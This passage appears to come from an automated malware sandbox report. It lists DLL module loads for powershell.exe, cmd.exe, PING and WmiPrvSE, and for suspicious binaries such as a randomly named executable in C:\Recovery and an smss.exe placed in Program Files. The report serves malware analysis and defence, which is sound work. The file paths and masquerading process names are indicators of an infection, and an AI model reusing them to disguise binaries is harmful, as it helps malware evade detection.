                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: mscoree.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: kernel.appcore.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: version.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: uxtheme.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: windows.storage.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: wldp.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: profapi.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: cryptsp.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: rsaenh.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: cryptbase.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: sspicli.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: mscoree.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: kernel.appcore.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: version.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: uxtheme.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: windows.storage.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: wldp.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: profapi.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: cryptsp.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: rsaenh.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: cryptbase.dll
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: version.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: ktmw32.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: wbemcomn.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: iphlpapi.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: dnsapi.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: winnsi.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: rasapi32.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: rasman.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: rtutils.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: mswsock.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: winhttp.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: rasadhlp.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: propsys.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: dlnashext.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: wpdshext.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: edputil.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: urlmon.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: iertutil.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: srvcli.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: netutils.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: wintypes.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: appresolver.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: bcp47langs.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: slc.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: userenv.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: sppc.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: version.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: version.dll
